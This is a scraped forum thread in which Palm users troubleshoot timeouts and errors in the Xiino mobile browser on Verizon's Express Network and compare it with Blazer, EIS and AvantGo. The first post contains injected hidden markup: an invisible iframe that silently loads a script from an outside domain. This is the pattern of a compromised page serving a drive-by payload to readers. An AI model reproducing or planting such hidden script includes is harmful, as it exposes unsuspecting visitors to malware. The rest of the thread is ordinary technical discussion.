+ Reply to Thread

Thread: Xiino

Xiino

I tried Xiino last night. It worked the first couple of times and then would just time out. Eudora and Eis still working fine. I've read posts about this problem referring to a problem with the proxy server, but couldn't find a solution. Anyone know of a solution? Can the proxy be change to another server? Or, should I just dump it and try Blazer? Express Network doesn't seem so "express" with EIS.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I had trouble connecting to a passworded wap site using EIS. I downloaded Blazer and it works great.

Yes- xiino works well, but I also find it just times out sometimes, I think related to a problem with the proxy server. There is a new browser out (a different EIS browser-- do a search for "ipanel" on palmgear) which is very large, but works from the SD card, and seems very good thus far. An unusual feature is that it offers 3 different views, which can be useful depending on the page being formatted.

Xiino problem -- help

I've been using the Xiino browser for several days with the Express Network on Verizon. It's worked quite well, and seems faster than Blazer (way faster than EIS), good with email attachments, good graphics, etc. Now all the sudden I get a "Time Out PPP" message every time I try to go to a web site. Anyone else have this problem or figure out how to fix it? This is really frustrating -- I really like this browser. Thanks in advance for any help.

I've had the same problem. It sucks! I tried all of the other browsers and just got xiino last week and was thrilled. It was so cool to be able to download directly to my palm, and it was fast. Hopefully it's just a temporary problem.

Thanks for your replies everyone. I'm still having the same problems. My proxy settings are the same as Robert's. I glad I haven't paid for it yet cuz I'm gonna dump it soon.

Folks,

Have you tried AvantGo's ability to be able to open any web page when you are online? Seems much more usable than anything else (including xiino) to me.

I haven't tried antyhing else for a few months, so comments are welcome. When I last tried Xiino I was not impressed...

Glenn

Originally posted by glenn_butler
    Folks,

Have you tried AvantGo's ability to be able to open any web page when you are online? Seems much more usable than anything else (including xiino) to me.

I haven't tried antyhing else for a few months, so comments are welcome. When I last tried Xiino I was not impressed...

Glenn
    Yes, but you cannot bookmark in AvantGo. Bummer.

Just heard back from Xiino technical support. They said their network was down yesterday (and they may be doing some more work over the next week). My browser is up and working well again. For me, this has been the fastest and best browser by a good measure for Verizon's express network.

Xiino vs. Blazer

My one complaint, and it just may be a setting, is this:

Try going to http://my.yahoo.com in both browsers. Blazer has the smarts to figure out that this site is also a WAP site and will invoke the WAP browsing portion of Blazer. Xiino gives you the full blown web page.

Can Xiino do WAP?

What does 'working fine' mean with a Palm browser. I love my Kyo phone but it has disappointed me on general web browing. I'm only using PQAs now -- and those are fine.

When I use either the Eudora or EIS browser with Express Network, images come in very slowly, sometimes just timing out. Should I adjust my browser setting. As of now, I'd consider my general browsing capabilities to be limited.

Perhaps I should try Xiino or Blazer, but I am hesitant before first finding out if I am getting max capability out of Eudora and EIS.

Even though Xiino is supposed to handle Javascript, when I try to visit Yahoo Mail I still get the message that I need to enable Javascript in my browser. I found a setting in Xiino that says "scripts" and its enabled but Yahoo Mail still gives me that message. What am I doing wrong. Is javascript disabled in the Xiino trial version I'm using?

Trying to use Xiino to download PDB files into Palm. My tests have been done with files from www.memoware.com/wireless, using some of the Top 10 downloads.

Memoware recognizes Xiino, says it supports downloads with Xiino, but when I try the browser loads a screen of gobbledygook -- I presume the binary of the file. It doesn't save the PDB.

Anyone know how I can do this? Or show me a test site that works?

xiino

I have been using xiino as a web browser on my 7135 with no problem. Just today, it would log on and then give me an "unrecoverable error" message on every web page I tried. I reloaded xiino and it still will not properly log on. Does anyone have any idea what the problem may be?

I had the same problem w/ Avantago tonight.. No idea why...

Administrator
    it could be something on xiino's end. it has given up some issues in the past because of the servers being in japan and timing out errors... just hold on and keep trying...

I'm getting "Unrecoverable Errors" in Xiino too, so I guess there's trouble on their end.

Of course, THIS is the time I've decided to play with overclocking, so I wasn't sure it was just me or something more system-wide.

-Warr

Unrecoverable error

I started getting this error on every page Xiino visited. Other browsers had no problems with the same sites.

Checking the prefs (OPTIONS menu -> PREFS), I didn't have the http or ftp proxies set on the first prefs page but, going to the second page, I found LOAD IMAGES set to ALWAYS. Believing their image server at pds.ilinx.co.jp might be down, I changed it to WHEN REQUESTED. That allowed pages to load. Of course, the pages didn't have any images but the text loaded correctly.

The PDF manual says to check their support page at http://www.ilinx.co.jp/en/ for updated info about the image server. That page still lists the same proxy server so it's probably just down.

LATER: Changed LOAD IMAGES back to ALWAYS and got images again so the proxy is back up!!

Mark.

xiino back in action

Xiino is back up and working. It must have been their server. It was reassuring to know it was not my 7135 that was on the blink. Thanks for your help.

Unrecoverable Error in Xiino 3.4.1E

I just got this error this evening after many monthes of perfect use.

I used msiple's tip and it is working again - I just went in and changed the preferences to Text-Only, from either of the settings that loaded graphics.

Thanks again, Mark.